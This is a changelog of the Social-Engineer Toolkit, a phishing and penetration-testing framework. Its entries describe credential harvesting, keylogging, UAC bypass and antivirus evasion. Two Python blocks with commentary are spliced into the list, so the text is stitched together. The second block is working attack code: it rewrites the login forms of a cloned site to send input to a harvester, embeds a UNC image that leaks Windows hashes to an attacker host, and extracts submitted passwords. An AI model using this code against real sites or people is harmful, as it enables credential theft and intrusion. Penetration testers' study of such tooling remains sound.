* Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path * Fixed a bug in the new backtrack5 to recognize airmon-ng * Added the ability to import your own code signed certificate without having to generate it through SET * Fixed an issue where the web templates would load two java applets on mistake, it now is correct and only loads one * Fixed a bounds exception issue when using the SET interactive shell, it was using pexpect.spawn and was changed to subprocess.Popen instead * Added better import detection and error handling around the python module readline. Older versions of python may not have, if it detects that python-readline is not installed it will disable tab completion * Added a new menu to the main SET interface that is the new verified codesigning certificate menu * Fixed a bug with the SET interactive shell that if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if an invalid number or non-numeric instance is given for input * Added more documentation around the core modules in the SET User_Manual * Updated the SET_User manual to reflect version 1.4 ~~~~~~~~~~~~~~~~ version 1.3.5 ~~~~~~~~~~~~~~~~ * Fixed a bug where create payload and listener wouldn't work for the new SET interactive shell or RATTE * Updated the SET User Manual for version 1.3.5 * Fixed the core.log(error) core library to properly log potential errors within SET * Updated the SET interactive listener to hold over nearly unlimited connections versus the 30 it was initially limited to * Turned the Java Repeater off by default, still a bit buggy, feel free to turn on if you want it * Added an automatic selection for the Sun Java Applet2ClassLoader Remote Code Execution to select java meterpreter since it is specific to the java meterpreter as a payload selection * Fixed alignment issues in the Metasploit attack vectors ~~~~~~~~~~~~~~~~ version 1.3.4 ~~~~~~~~~~~~~~~~ * 
Fixed a bug where from src.core.core import * would cause an exception * Added the set-proxy addition that will allow you to configure a proxy when using SET * Added additional error handling in the SET web gui * Fixed an issue where set-proxy wasn't configuring the proxy on certain linux distributions * Added the Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability from the Metasploit Framework ~~~~~~~~~~~~~~~~ version 1.3.3 ~~~~~~~~~~~~~~~~ * Added keystroke_start command to the SET interactive shell * Added keystroke_dump command to the SET interactive shell * Fixed a bug where downloading a file wouldn't work properly * Added a socket timeout and unique identifier for connecting shells. Will stop non-SET shells from connecting and drop the socket if it isn't the interactive shell * Fixed a bug in keystroke_dump where interactive shell would not properly send signal back and cause a broke pipe error * Added lockworkstation command to the SET interactive shell. Useful for keystroke logging * Fixed a bug where the encoder was not properly handling the set interactive shell * The keystroke_start does not currently work if victim locks there screen due to not being fully injected into something that can monitor keystrokes, for example explorer.exe. Process injection will be coming soon. 
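The 1.3.3 entry above adds a socket timeout and a unique identifier so that only the SET interactive shell is allowed to stay connected to the listener. The block below is an added illustration of that idea and is not SET's code: the identifier string, the timeout value and the three loopback "peers" (a real shell, a stray HTTP scanner, a socket that never speaks) are all constructed for the example. A plaintext identifier like this only filters stray connections; anyone who has captured one client run can replay it, which is why the later AES change in 1.3 matters more for an actual deployment.

```python
import socket
import threading

# Constructed for this example; the identifier and timeout are assumptions,
# not the values SET itself uses.
SHELL_ID = b"SET-ISHELL-1"
HANDSHAKE_TIMEOUT = 1.0


def _recv_exact(conn, n):
    """Read exactly n bytes, or whatever arrived before EOF."""
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def verify_client(conn, expected=SHELL_ID, timeout=HANDSHAKE_TIMEOUT):
    """Keep the connection only if the peer presents the expected identifier
    within the timeout; otherwise close it and report False."""
    conn.settimeout(timeout)
    try:
        banner = _recv_exact(conn, len(expected))
    except (socket.timeout, OSError):
        conn.close()
        return False
    if banner != expected:
        conn.close()
        return False
    conn.settimeout(None)  # back to blocking for the interactive session
    return True


class Listener:
    """Accepts a fixed number of connections and keeps only verified shells."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.shells = []
        self.rejected = 0

    def serve(self, count):
        for _ in range(count):
            conn, addr = self.sock.accept()
            if verify_client(conn):
                conn.sendall(b"OK")
                self.shells.append((conn, addr))
            else:
                self.rejected += 1
        self.sock.close()


def _peer(port, payload, wait_for_server):
    """Constructed peer: optionally send payload, optionally wait for the
    server's reply (or for the server to hang up)."""
    c = socket.create_connection(("127.0.0.1", port))
    if payload:
        c.sendall(payload)
    reply = b""
    if wait_for_server:
        c.settimeout(3)
        try:
            reply = c.recv(2)
        except socket.timeout:
            pass
    c.close()
    return reply


def demo():
    """Run the listener against three constructed peers.
    Returns (verified_shells, rejected_connections, reply_seen_by_real_shell)."""
    lst = Listener()
    t = threading.Thread(target=lst.serve, args=(3,))
    t.start()
    reply = _peer(lst.port, SHELL_ID, wait_for_server=True)          # real shell
    _peer(lst.port, b"GET / HTTP/1.0\r\n\r\n", wait_for_server=False)  # stray scanner
    _peer(lst.port, b"", wait_for_server=True)                        # silent socket, times out
    t.join()
    for conn, _ in lst.shells:
        conn.close()
    return len(lst.shells), lst.rejected, reply
```

demo() returns (1, 2, b"OK"): the shell that sent the identifier is kept and answered, the scanner is dropped on its first bytes, and the silent socket is dropped when the handshake timeout expires rather than tying up the accept loop.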
* Started converting sys.path.append core import modules to from src.core.core import *
* Fixed a bug where multiattack would throw a port not defined if default was selected
* Fixed a bug where harvester would throw an exception if multiattack was used
* Fixed a bug where web_server start would throw an exception if web server wasn't listening properly
* Big stability update on how connections are handled and during times of error on keeping the connections alive
* Fixed alignment on spear-phishing and client-side attack to align properly
* Added better quit handling in the web attack vector specifically when cloning a website or in payload generator
* Fixed a bug in create your own payload that would flag core not defined, thanks Luca!
* Fixed a bug in the webgui that the update everything would cause an exception error
~~~~~~~~~~~~~~~~
version 1.3.2
~~~~~~~~~~~~~~~~
* Added a new feature to the SET interactive shell, grabsystem. Will allow you to elevate permissions on victim machine. Does not work on XP SP2 and below.
* Fixed a bug where if grabsystem was called on with UAC bypass, the UAC-Safe shell would hang
* Added better error handling of sockets and addresses in the socket handlers in the interactive shell
* Updated the code base in the shell.binary to add the new grabsystem and add better error handling
* Added default handling if listener port was nothing, defaults to port 443 now
* Fixed a bug in how third party handlers responded to certain character sets
* Slowly moving to __init__.py method as it's proper and easier than sys.path.append
~~~~~~~~~~~~~~~~
version 1.3.1
~~~~~~~~~~~~~~~~
* Fixed a bug in the SET interactive shell that was causing it to fail if the pycrypto module was not installed
* Updated RATTE to include better handling of injection
* Bug fix for the wireless attack vector not properly putting things in monitor mode
* Added changes to the wifi attack where it detects if airmon-ng is installed first and uses the path, or uses the one built into SET
* Added better error handling around the Python-crypto module
* Fixed a problem where in the SET Interactive Shell upload would throw an exception if file wasn't found
* Fixed a bug where upload would cause an exception error and not properly upload the file
* RATTE now runs in the background without a command prompt popping up and automatically restarts firefox or IE, no longer need to close / reopen
* Fixed a major bug where quitting the SET interactive shell would not allow you to drop into other sessions
* Added bypassuac to the SET interactive shell, this allows you to bypass the user access control in Windows Vista, Windows 2008, and Windows 7 fully patched
* Added a ton of stability exception handling in case something goes wrong session will still be up
* Added tab completion for commands that are available through the SET interactive shell
* Added up arrow last command so you can reuse the last commands you had when you type something in
* Added exception handling if you type a command in wrong, it will let you know the proper syntax
* Fixed a bug where you would either quit or control-c during the list of shells and it would cause the victim machine's CPU to spike to 100 percent
* Added the ability to see * UAC Bypassed * in the shell window if the bypassuac was successful on the system.
* Added error message handling around the SET Interactive Shell commands, so for example if you type bypassuac it will prompt you for the right commands
* Fixed a bug where ps would display an error 'pid' not defined
* Fixed a bug where after executing the kill command on process, it would error out on next command saying "Confirmed Kill" base 10 error.
* Updated RATTE to include better descriptions around what to do when a session has been established
* Fixed a bug where multiattack would throw a site_cloned exception.
* Fixed a bug where the new SET payload would not properly work with the multiattack vector
* Fixed a bug where the new RATTE payload would not properly work with the multiattack vector
* Fixed a bug where using site templates instead of site cloner would throw an exception if selected
* Added an unrecognized command syntax for the SET interactive shell and removed accidental printing of command via the exec command
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* Updated the web-gui interface to reflect all new PDF exploits
* Updated the web-gui interface to reflect all new client-side exploits
* Added a new setup.py installer file for debian based systems only, will add manual install options later
* Updated all of the powershell HID attack vectors to fix bugs and support multi-language support. Thanks padzero!
* Added AES encryption to the socket communication, it requires Crypto.Cipher which is from the PyCrypto libraries.
* Added python-crypto to the installer setup.py installation
* Fixed web-gui alignment on new options so they match up properly to SET-interface
* Added better error handling around the openssl python module if it isn't installed
* Added download_file capabilities into the SET interactive shell.
* Added upload_file capabilities into the SET interactive shell.
* Added shell capabilities into the SET interactive shell.
* Added ssh_tunneling capabilities into the SET interactive shell. You can tunnel any port you want to over ssh
* Added a teensy Gnome wget payload thanks to Hugo Caron (y0ug)!
* Fixed a bug in a menu where teensy payload return to menu would not return properly to main menu
* Fixed a bug where the Mass Mailer Menu didn't properly return back to main menu when specified.
* Added process list in the SET interactive shell.
* Added process kill in the SET interactive shell.
* Added dsniff to set_config as an option instead of ettercap, can use either one.
* Added centralized logging in SET, log files will now be dumped to src/logs/set_logfile.log
* Added logging to main SET interface, handles main SET interactive shell errors
* Added logging to arp_cache.py file, handles arp cache errors
* Added logging to hijacking.py file, handles dll_hijacking errors
* Added logging to harvester.py file, handles credential harvesting errors
* Added logging to payloadgen.py file, handles payload generation errors
* Fixed a bug where if site wouldn't clone properly it would just exit SET, it now just returns back to main menu.
* Fixed a bug where the new addition to dnsspoof would not properly kill dnsspoof when exiting SET, it now terminates when an exception is thrown
* Added logging to web_server.py file, handles main SET web server errors
* Added logging to spawn.py file, handles main spawn handles for SET
* Added the ability to specify high priority during emails or not, thanks Jonathan Murray!
* Added new core module library called log(error) will centralize log messages through core function calls
* Added the new Sun Java Applet2ClassLoader Remote Code Execution Exploit from Frederic Hoguin and jduck that was recently added to Metasploit
* Moved version number to src/main/ instead of src root
* Added the new RATTE payloads to SET that was created by Thomas Werth to circumvent firewall based restrictions. Awesome addition!
* Added the new DSNIFF changes to the web gui to ensure that when the option is enabled in set_config it now gets picked up in web gui
* Fixed a bug in web gui where if HTML/Plain wasn't specified, it would not properly run the answer file to launch the attack
* Added the SET interactive shell to the Java Applet Attack Vector on the SET web-gui
* Fixed a mishandling of OS.Error exceptions in spawn.py which caused SET to spit out a pexpect exception error when using KeyBoardInterrupt exception handler
* Deleted the database directory under src, was no longer needed
* Added the Sun Java Applet2ClassLoader Remote Code Execution by Frederic Hoguin and jduck to the web gui interface
* Added RATTE to the SET Web GUI under the payload selection area, it's only to be used for the Java Applet attack.
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability from the Metasploit Framework to SET
* Added the Adobe Flash Player AVM Bytecode Verification Vulnerability to the SET web gui.
* Added six more spear-phishing templates that can be found under the spear-phish attack menu
* Added a new attack vector called the SET Wireless Attack Vector, this will create a fake access point and redirect all traffic to you
* Added the ability to stop all services/processes started by the SET Wireless Attack vector, it is now under the options menu
* Added the Thomas Werth RATTE module to third party modules as well as under the main payload section. Great example to tweak third party modules and add things.
* Added airbase-ng to SET in case it is not installed. Thanks to Mister-X for the approval to include it into SET!
* Added new wireless attack vector to the SET web gui, menus have been changed slightly
* Added the new templates recently added to the SET web gui, they are under the spear-phish menu
* Added a binary rewrite of UPX encoder stubs so that it randomizes a three character alphanumeric to remove UPX from the binary. A bit better obfuscation for A/V detection.
* Fixed a bug where upx encoding wasn't working properly and wouldn't encode the right binary
* Added a new core module called core.upx(path_to_file) which will automatically encode the file via upx and rewrite the UPX stubs with a three character alphanumeric stub
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* Rehauled a lot of manual reused code and defined them in function calls and classes in src/core.
* Added the windows/fileformat/ms10_087_rtf_pfragments_bof to the Metasploit Client-Side Attack vectors.
* Added the windows/fileformat/ms11_xxx_createsizeddibsection to the spear-phishing attack vector
* Changed the default for UNC embed to OFF instead of ON, don't want SMB alarms going off on phishing attacks unless you know the port is open.
* Dynamically import third party modules in the modules/ folder. You can now create your own modules and have them show up in the SET "Third Party Modules" menu
* Added core system call meta_path()
* Added core system call grab_ipaddress()
* Added core system call check_pexpect()
* Added core system call check_beautifulsoup()
* Added core system call cleanup_routine()
* Added core system call update_metasploit()
* Added core system call update_set()
* Added core system call help_menu()
* Added core system call date_time()
* Added core system call generate_random_string(low,high)
* Added core system call site_cloner(website)
* Added core system call meterpreter_reverse_tcp_exe(port)
* Fixed an issue where the report generator would not render the html properly
* Added core system call metasploit_listener_start(payload,port)
* Added core system call start_web_server(directory)
* Added core system call java_applet_attack(website,port,directory)
* Added core system call teensy_pde_generator(attack_method)
* Updated the user manual to reflect the SET v1.2 changes and add a custom module creation tutorial
* Fixed an issue where it would throw an exception on central. not being defined, should be core.
* Fixed a core error message in the spear phishing attacking vector
* Fixed a bug in spear phishing where it would throw meta is not defined
* Fixed an issue in creating your own payload/listener where a core error would not be defined
* Added core system call windows_root()
* Changed the ms11_xxx to ms11_006 to match Metasploit's new naming scheme for the exploit
* Fixed a bug with the adobe pdf nojs exploit in the spear phishing
* Added some changes to the Teensy WSCRIPT Payload to support Windows 7. Special thanks to Peter Osterberg
* Added detection if facebook.com was entered it tries cloning https://www.login.facebook.com/login.php instead due to strange iframe issues with facebooks site (thanks Kevin)
* Fixed an issue when trying to create a PDF embedded exe in spear phishing, thanks Cam!
* Removed a large portion of code from the disitool functionality since the function calls DeleteDigitalSignature and CopyDigitalSignature are only used.
~~~~~~~~~~~~~~~~
version 1.1.1
~~~~~~~~~~~~~~~~
* Added a new configuration option called UNC_IMBED which will embed UNC paths to the web_cloner attack method so when a victim browses to your site if 445 is open outbound, it will pass the Windows hashes to you automatically and still allow additional attacks
* Added a new option in the Spear-Phishing attack vector to use the UNC file path attack vector to harvest LM credentials via the attack vector through the capture/smb Metasploit module.
* Added an ignorecase statement to the credential harvester which wouldn't properly handle capitalized method=POST, it now accepts either
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* Added a new configuration option AUTO_REDIRECT=ON/OFF, this will turn off automatic redirects once the payload is successful. This works for Java Applet.
* Fixed wording on the AUTO_DETECT=OFF prompting, it was a bit confusing.
* Changed the old IE exploit ms_xxx_ie_css_clip to reference the update in Metasploit to ms10_090_ie_css_clip
* Added a handler for stale processes when closing SET. It should now close any lingering threads or processes when exiting.
* Added the Internet Explorer CSS Import Use After Free exploit by JDuck from Metasploit
* Added the Foxit Pro PDF buffer overflow exploit from Metasploit.
* Added the Nuance PDF buffer overflow exploit from Metasploit.
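Two of the 1.1.1 entries above describe what the cloner does to a copied page: it rewrites POST forms so they submit to the credential harvester (the ignorecase fix is what makes a form written as METHOD="POST" get caught), and, with UNC embed on, it adds a UNC path so a Windows browser that can reach 445 outbound will authenticate to the attacker's host. The block below is an added illustration of both steps plus the harvester side of the post, written for this page and not taken from SET; the sample page, the harvester URL 10.0.0.5 and the share name are constructed. As the 1.2 entry notes, the UNC image is off by default for a reason: every victim whose egress allows 445 will light up SMB monitoring on the way out.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of a cloned login page. The first form uses upper-case
# METHOD="POST", the second an unquoted method=post, the third is a GET form.
SAMPLE_PAGE = """<html><body>
<form NAME="login" METHOD="POST" ACTION="https://example.com/login.php">
<input name="user"><input type="password" name="pass"></form>
<form method=post action=/session><input name="q"></form>
<form method="get" action="/search"><input name="s"></form>
</body></html>"""

FORM_TAG = re.compile(r"<form\b[^>]*>", re.I)
# re.I is the "ignorecase" fix: POST, Post and post all match.
POST_METHOD = re.compile(r"""\bmethod\s*=\s*["']?\s*post\b""", re.I)
ACTION_ATTR = re.compile(r"""\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)


def rewrite_post_forms(html, harvester_url):
    """Point every POST form at the harvester, whatever the attribute casing.
    Returns (rewritten_html, original_actions); the harvester needs the
    original action to redirect the victim to the real site afterwards."""
    originals = []

    def fix(match):
        tag = match.group(0)
        if not POST_METHOD.search(tag):
            return tag                      # GET forms are left alone
        act = ACTION_ATTR.search(tag)
        if act:
            originals.append(next(g for g in act.groups() if g is not None))
            tag = tag[:act.start()] + 'action="%s"' % harvester_url + tag[act.end():]
        else:
            originals.append(None)          # form posted back to the page itself
            tag = tag[:-1] + ' action="%s">' % harvester_url
        return tag

    return FORM_TAG.sub(fix, html), originals


def embed_unc_image(html, unc_host, share="share"):
    """Insert a 1x1 image whose src is a UNC path (\\\\host\\share\\file). A
    Windows browser that can reach TCP 445 on unc_host will try to authenticate
    when it loads the image; the rest of the page is untouched, so the other
    attacks on the cloned site keep working."""
    img = '<img src="\\\\%s\\%s\\pixel.jpg" width="1" height="1" alt="">' % (unc_host, share)
    body = re.search(r"<body\b[^>]*>", html, re.I)
    if body:
        return html[:body.end()] + img + html[body.end():]
    return img + html


def capture_post(body, sensitive=("pass", "password", "pwd")):
    """Parse a posted form body as the harvester's POST handler would and
    pick out fields whose names look like credentials.
    Returns (all_fields, credential_fields)."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    creds = {k: v for k, v in fields.items() if any(s in k.lower() for s in sensitive)}
    return fields, creds
```

On SAMPLE_PAGE, rewrite_post_forms returns the two POST forms pointed at the harvester with original actions ["https://example.com/login.php", "/session"] and leaves the GET form's action="/search" alone; without re.I the first form would have been skipped exactly as the bug report describes.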
* Cleaned up the smtp sending code with better definitions and function calls
* Optimized heavy portions of code to make SET run much faster including the web server
* Added the Microsoft WMI Administration Tools ActiveX Buffer Overflow exploit into the browser exploit section
* Added better description handlers around set-updates, set-web, set-automate, and inside the main set files
* Added central.py to main system files, this will be the home of the central calls and definitions through SET going forward
* Added a new addition to add UPX encoding if you have UPX installed somewhere within the SET_CONFIG, adds better AV evasion
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* Added the new set-automate functionality which will allow you to use SET answer files to automate setting up the toolkit
* Added bridge mode to Ettercap if you want to utilize that capability within Ettercap
* Fixed an issue where multiple meterpreter shells would spawn on a website with multiple HEAD sections in the HTML site
* Added the Metasploit Browser Autopwn functionality into the Metasploit Attack Vector section
* Fixed the dates on DerbyCon, supposed to be September 30 - Oct 2 2011 instead of September 29 - Oct 2 2011
* Added the ability to utilize templates or import your own websites when using credential harvester, tabnabbing, or webjacking
* Fixed an integer error issue with Java Applet when exiting SET
* Changed the timing for the wscript payload from 15 seconds to 10 seconds to minimize delay
* Added a custom written DLL for SET and the DLL Hijacking, user has to extract the zip file for it to work properly
* Redid the report templates for credential harvester to reflect the new look for secmaniac.com
* Removed the modified calc.exe and replaced with a modified version of putty.exe to get better AV detection
* Redid the dll hijacking attack to include rar and zip files, rar is better to use winzip compatible and will execute
* Added an additional dll hijacking dll that will be used for the main attack, uses a purely C++ native method for downloading and executing payloads
* Fixed the defaulting application for the Client-Side attack vector, it was defaulting to PDF when it should be an IE exploit
* Fixed a bug where hitting enter at the web attack vector would cause an integer base 10 error message
* Added the Adobe Shockwave browser exploit that I wrote for the Metasploit Framework.
* Moved all of the SET menu mode source to main/set.py, the main set loader is just a small import now. More clean.
* Changed some spacing issues in the client-side attack vectors
* In spear-phishing, cleaned up excess messages being presented back to the user when PDF was created or files were moved
* Fixed a bug in the web cloner where certain ASPX sites wouldn't clone and register properly, thanks for the patch Craig! Added you to credits.
* Added the SMS attack vector which can spoof SMS messages to a victim, it will be useful in nature if you want them to click a link or go somewhere you have a malicious site. Thanks to TB-Security.com for the addition.
* Added the Metasploit Sun Java Runtime New Plugin docbase Buffer Overflow universal client side attack
* Added the parameter for the java applet called separate_jvm, this will spawn a new jvm instance so cache does not need to be cleaned
* Fixed a bug where the SET Python web server would not properly shut down in certain circumstances
* Added a repetitive refresh flash for the java applet, so if a user hits cancel, it will prompt over and over until run is hit. Better way of getting the user to hit run.
* Added the configuration option to turn off the java repeater, so if you're using something like multi-attack you can specify so it doesn't keep nagging the user if you want multiple attack vectors
* Fixed a bug where spear phishing attack would not spawn meterpreter listener when yes was specified, this was caused by the new dll hijacking addition.
* Added better connection handling through the spear-phishing and gmail integration, it wasn't properly closing the connection per request
* Fixed bug where using infectious media and file format would prompt you to use the spear-phishing mailer option afterwards, it no longer prompts for that during infectious media creation
* Removed the option to include how many times to include, automatically defaults to 4, option is configurable in set_config now
* Added the Metasploit Adobe FlashPlayer "Button" Remote Code Execution exploit to the spear-phishing/file format attack vectors
* Added the ability to hit enter on yes or no payload selection default to the infectious usb method, enter would just return you to the menu, it now spawns a listener
* Removed the return to continue prompt in the Teensy HID USB attack vector, it wasn't needed and added additional steps
* Added the new SET web interface, it primarily utilizes the new set-automate functionality based on responses for a payload, will improve as time goes on
* Added the reverse DNS meterpreter payload to both client-side attacks as well as payload generators for things like Java Applet, Teensy, attacks, etc.
* Fixed an issue where the Adobe 'Button' exploit was not properly loading and exporting the PDF through Metasploit
* Added the Internet Explorer CSS Tags Memory Corruption exploit to the Metasploit Client-Side attack vector through web attack.
* Fixed a large bug within mass mailer, if you were using Google Mail with multiple targets, there was a mis-matched counter that would only send one email, not to the rest of the list. It now functions correctly
* Fixed a bug where if you turned sendmail to off and you used open mail relays, the email wouldn't be delivered properly. It now sends as expected
* Added javascript replacement of the ipaddress under name in Java Applet, this is configurable under set_config, it defaults now to Secure Java Applet instead of your IP Address (more believable)
* Added the ability to change the bind interface for the command center. By default it's on localhost only, but you can configure to listen on all interfaces and hit the web interface remotely.
* Updated the SET User Manual to reflect the changes of version 1.0, it incorporates the web interface, set-automate, SMS spoofing, new configuration options, and much more.
* Fixed a bug where you would leave SET or still be in and a stale HTTP web server process would still be there. SET now checks to see if the process is stale and terminates it.
* Added the ability to toggle different shell terminal windows within the command-center. For example you can select XTERM, KONSOLE, and GNOME through the set_config. XTERM will be the default.
* Fixed a bug where the repeater and java applet wouldn't properly work if you used your own template or ones built into SET
* Added a new set_config option for the timing around java-repeater. You can set the seconds for it to repop if you want to tune. Default is 200 (2 seconds)
* Added a default option in Java Applet attack, if you hit return for targeting Linux/OSX it will default to port 8080 and port 8081 for the listeners
* Fixed a small menu bug within client-side attack, the menus wouldn't line up properly
* Added a patch from Thomas Roth to fix a bug in the java_applet pde file for the Teensy attack vector
* Fixed a bug where site would not clone properly or inject iframes in certain websites, it was due to lack of proper regular expression filters, this has been corrected
* Added better detection on site cloner to handle tags with java applet that aren't standard, for example
* Fixed a pervasive bug that has been around since 0.3 which when running SET and the python web-server, if you exited you would have to wait a period of time to relaunch because of the TIME_WAIT flag on the socket. After some recoding of the web-server, the socket can be rebound with the TIME_WAIT flag still in play and still function normally
tags with metasploit browser attack. There were times where the site would clone but not properly inject iframes into the head tags. This has been resolved in both single metasploit client-attack and multiattack * Changed iframes to to fix bugs within MSF-based payloads. They die if iframes are utilized for some reason. Thanks Matt! * Added a new configuration flag that turns autoscript migrate -f on metasploit based payloads, new flag is AUTO_MIGRATE=OFF/ON * Added better error handling in the main set loader, was throwing proc errors every so often * Added a new flag within the set_config called digital_signature_steal which incorporates Didier Stevens digital signature stealing tool called disitool * Added an addition to the docbase exploit, if the exploit is selected, framesets are used for the attack vector because with iframes it completely bombed, this was a funky workaround * Added a new configuration flag to turn persistence on with Metasploit's Meterpreter if you want it * Removed persistence configuration option, it will be shortly replaced by a much more flexible configuration * Added a new config option that allows you to specify a multiscript meterpreter command. In cases where you use SET and maybe your sleeping or you aren't there, you can piggy back script execution on a meterpreter session connection. For example you could run persistence, or run other scripts that help aid your effort on the penetration test. 
* Fixed a bug where import your own payload would not properly work within the java applet * Fixed a bug where meterpreter multi scripts was not properly defined within metasploit client-side attacks and would throw an exception * Fixed an import error issue with base64 when sending base64 encoded emails through multiple email medians * Added the ability to customize what port the metasploit browser attack runs on, by default its on 8080 however this is now customizable through the set_config * Fixed a base 10 error message within SET in the Web attack menu, if you did not input an integer it would error out giving a base 10 error message, it now returns to the prior menu as expected * Added better executable obfuscation on the filename when the Java Applet triggers, it use to be static to java.exe, now its a randomized executable name. * Changed the client side attack to default to the docbase buffer overflow instead of the xss vulnerability, more universal in nature * Added some more comments in the set_config file for confusion around the self-signed java applet functionality * Fixed a bug where the Java Repeater on some systems would not properly forward off to the legitimate cloned website when run was hit, seemed to affect Windows XP in certain scenarios, this has since been corrected and properly addresses the legitimate site after run has been executed * When using option 4, it would ask for two IP addresses with AUTO_DETECT=OFF, this has been changed to only flag to one question since the listener binds to 0.0.0.0 (all interfaces) * Turned digitial signature stealing ON by default, it will just default back to normal if it doesn't detect the pefile import * Changed wording to reflect reverse dns as a hostname not tunneling over DNS, was wrong description ~~~~~~~~~~~~~~~~ version 0.7.1 ~~~~~~~~~~~~~~~~ * Added the ability to use fileformat exploits in the USB/DVD/CD Infectious Attack Vector * Fixed a couple of wording issues in the client-side attack vector 
payloads section * Added Meterpreter SSL connection payload for client-side attacks * Added Meterpreter SSL connection payload for fileformat attacks * Added Meterpreter SSL connection payload for browser attack vectors * Fixed an issue with the utilprint exploit in the file format attacks * Added the Metasploit PDF embedded executable fileformat exploit with no javascript * Fixed a bug where equal signs would throw the website off and cause an error cloning * Updated the user manual to reflect the latest changes in 0.7.1 ~~~~~~~~~~~~~~~~ version 0.7 ~~~~~~~~~~~~~~~~ * Fixed the NAT/Port FWD descriptions to be a little bit more descriptive * Bug fixes on payload gen with x64 bit payloads in Metasploit * Added new Multi-Attack Payload option to utilize multiple attack vectors * Incorporated Multi-Attack into each web attack vector * Added a PID management system in SET for stray processes * Cleaned up payloadgen code and SET code to reflect new multiattack changes * Added the web jacking attack vector by white_sheep, emgent, and the Back|Track team * Fixed an issue with ARP Cache defaulting, it should now poison everyone * Added better error handling within the SET menus, still needs a bit more work * Cleaned up color schema and removed old code * Added the Adobe CoolType SING Table 'uniqueName' Overflow zero day from Metasploit in spear phishing * Added two more Teensy based payloads, thanks Garland! * Added HTML support for Spear-Phishing Attack Vector * Added HTML support when WEBATTACK_EMAIL=ON for web attack vector * Added the Adobe Cooltype SING Table Overflow zero day for browser exploit * Added the new SET User Manual to readme/. This is a big update and has updated content for 0.7 * Fixed a simple yes or no answer when requirements for SET were not met * Removed a control-c option if multi-attack was specified for harvester * Added a check for APACHE_SERVER and multi-attack. 
Will now throw an error since it's not supported yet ~~~~~~~~~~~~~~~~ version 0.6.1 ~~~~~~~~~~~~~~~~~ * Added the ability to utilize SSL with credential harvesting or tabnabbing attack, you can import your own PEM files or utilize self-signed (SET creates for you) * Fixed the lnk exploit path since it changed within Metasploit * Added -n to disable database support (not needed for SET) * Added cgi.escape to filewrite output to remove a local XSS attack that could happen on credential harvester/tabnabbing attack * Added -L to remove error messages when using other platforms outside of standard Linux OS (i.e. osx, ipad, iphone) * Fixed reverse VNC from not properly executing with DisableCourtesyShell * Fixed issue where teensy.pde would not properly write out if no handler was specified * Added the latest Metasploit Hijacker DLL exploit (zero day) * Bug fix in Java Applet backdoored executable, for some reason EXE was getting corrupt with latest Metasploit updates * Removed the encoder option in msfconsole, no longer needed * Changed numbering on Metasploit Client-Side Attack vector * Fixed an issue with webdav Metasploit based exploits not deploying right when using 8080 as an alternate port * Added more extenstions to the DLL Hijacking issue * Removed an old print statement in cloner.py * Added the download/exec payload in the Metasploit exploit attack vector, you can now download/exec payloads * Added the ability to set the port on reverse through Metasploit client attacks * Added Metasploit's allports payload to Metasploit exploit attack vector * Added a display message for the teensy output to ensure to select usb/keyboard in tools + board in Arduino * Fixed a bug with site cloner that would not properly clone a site on some operating systems * Fixed a bug that would cause java applet not to work based off of a bad subversion update * Added the ability to utilize SET with Port Forwarding/NAT where your IP may be different from the reverse listener, it will 
prompt now when AUTO_DETECT is set to OFF * Added better obfuscation for the downloader, no longer needs an .EXE extension, it rewrites on the fly to the OS for better IPS/IDS evasion * Added a couple changes to the Java Applet source code and added a small tool for compiling it * Added method=post for detection on html for the credential harvester method * Added the Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution exploit into the Metasploit Client-Side attacks ~~~~~~~~~~~~~~~~~ version 0.6 ~~~~~~~~~~~~~~~~~ * Number of bug-fixes through SET and better error handling * Added the tabnabbing attack vector * Added favicon pulling per site on tabnabbing * Fixed dynamic import bug with reloading modules after use * Added Man Left in the Middle (MLITM) from Kos * Added the latest IE and Adobe exploits * Rewrote the HTTP web server handler for WebDav based exploits, it will force SET to use port 8080 as the web server as MSF requires WebDav on 80. * Rearranged the initial web attack vector menu, it needed to be reversed * Added the ability to specify your own custom executable for MSF encoding (-x) within the config/set_config file, the new option is called 'CUSTOM_EXE' * Added checks for BeautifulSoup, it is now a requirement for SET for the MLITM attack * Fixed the no encoding issue with Java Applet Attack Vector, when specifying no encoding it will not prompt you to encode the payload * Fixed bleed over colors when bombing out of any of the SET menus * Added the ability to be able to customize MLITM web server port address in set_config, default is 80. 
* Fixed an issue with Java Applet attack where if WEB_PORT was changed from 80, the Windows and NIX payloads would not deploy properly based off of port change * Fixed an issue where importing your own executable with the Java Applet attack would fail and not work properly * Fixed where OSX and LINUX payloads would still be asked for in payloadgen if not using the Java Applet attack * Added the new Teensy Arduino attack vector menu that can be used with the Teensy USB HID devices that can bypass autorun disabled for physical/social-engineering attacks * Fixed issue where ettercap was not properly performing DNS_POISON attacks, should now dns poison properly * Removed the IP address challenge question when importing your own exe * Fixed issue where other python applications would close when exiting SET * Rewrote html handler to fix stderr and stdout issues with subprocess and ettercap handlers, should close properly when exiting SET now * Fixed the main bug with Linux/OSX via Java Applet and no shell being piped, should now be 100 percent operable * Fixed issue where VNC courtesy shell would still be present even when disabled * Thomas Werth Java Applet is now open source, can be found under src/java_applet * Fixed a bug where credential harvester would clone a website twice * Fixed an issue where some sites would not properly rewrite with the credential harvester * Added the ability to automate the payload deployment through Teensy * Added the ability to use Apache with the Teensy attach vector or the built-in SET server * Fixed a bug where if an invalid response was given in PEXPECT installation, it would continue and cause issues when the requirements were not met * Changed the MS10-042 to reflect the MSF changes 